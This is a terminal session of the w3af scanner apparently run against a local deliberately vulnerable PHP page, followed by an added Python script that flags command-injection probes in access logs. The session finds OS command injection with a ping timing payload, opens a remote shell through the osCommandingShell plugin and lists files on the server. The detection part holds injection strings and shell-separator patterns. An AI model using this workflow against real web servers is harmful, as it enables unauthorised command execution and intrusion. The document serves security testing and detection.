dz0@sock3t:~/w3af$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output
Enabled output plugins:
textFile
console

w3af/plugins>>> output config textFile
w3af/plugin/textFile>>> set fileName output-w3af.txt
w3af/plugin/textFile>>> set verbosity 10
w3af/plugin/textFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 0
w3af/plugin/console>>> back
w3af/plugins>>> back
w3af>>> plugins
w3af/plugins>>> audit osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
osCommanding

w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/target>>> back
w3af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting osCommanding plugin execution.
100% [====================================================] 1/1
OS Commanding was found at: http://localhost/w3af/osCommanding/vulnerable.php . Using method: GET. The data sent was: command=+ping+-c+6+localhost. The vulnerability was found in the request with id 3.
w3af>>> exploit
w3af/exploit>>> exploit osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited. This is a list of available shells:
- [0]
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-0>>> ls
lalal
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell-0>>> endInteraction
w3af/exploit>>> back
w3af>>> exit
got shell?
dz0@sock3t:~/w3af$
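The session above shows the osCommanding audit plugin confirming the flaw with a timing probe (command=+ping+-c+6+localhost, the '+' being a URL-encoded space). The following is an added detection example, not part of w3af or of the original session: it URL-decodes the query string of access-log lines (constructed here) and flags parameter values carrying that ping probe or a shell separator, so the scan would be visible server-side.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (not taken from the session above).
# The second request carries the exact probe the osCommanding plugin sent.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2010:13:55:36 +0000] "GET /w3af/osCommanding/vulnerable.php?command=f0as9 HTTP/1.1" 200 512
127.0.0.1 - - [10/Oct/2010:13:55:37 +0000] "GET /w3af/osCommanding/vulnerable.php?command=+ping+-c+6+localhost HTTP/1.1" 200 640
127.0.0.1 - - [10/Oct/2010:13:55:38 +0000] "GET /w3af/osCommanding/vulnerable.php?command=ls HTTP/1.1" 200 300
127.0.0.1 - - [10/Oct/2010:13:55:39 +0000] "GET /index.php?page=about HTTP/1.1" 200 1200
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Timing probe as used by the scanner: ping with a fixed count acts as a sleep.
PING_PROBE_RE = re.compile(r'(^|\s)ping\s+-[cn]\s+\d+\s+\S+')
# Shell separators that chain a second command onto an expected value.
CHAIN_RE = re.compile(r'[;&|`]|\$\(')


def classify_value(value):
    """Return a reason string if a decoded parameter value looks like an
    OS command injection attempt, else None.

    Caveat: a bare command such as 'ls' (seen in the interactive shell above)
    has no separator and cannot be told apart from legitimate input without
    knowing the parameter's expected format; that check belongs in the app.
    """
    if PING_PROBE_RE.search(value):
        return "ping-based timing probe"
    if CHAIN_RE.search(value):
        return "shell command separator"
    return None


def scan_access_log(text):
    """Return (uri, parameter, decoded_value, reason) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        uri = m.group("uri")
        # parse_qsl decodes '+' and %XX, so the probe becomes ' ping -c 6 localhost'
        for param, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append((uri, param, value, reason))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious request: uri=%s param=%s value=%r reason=%s" % hit)
```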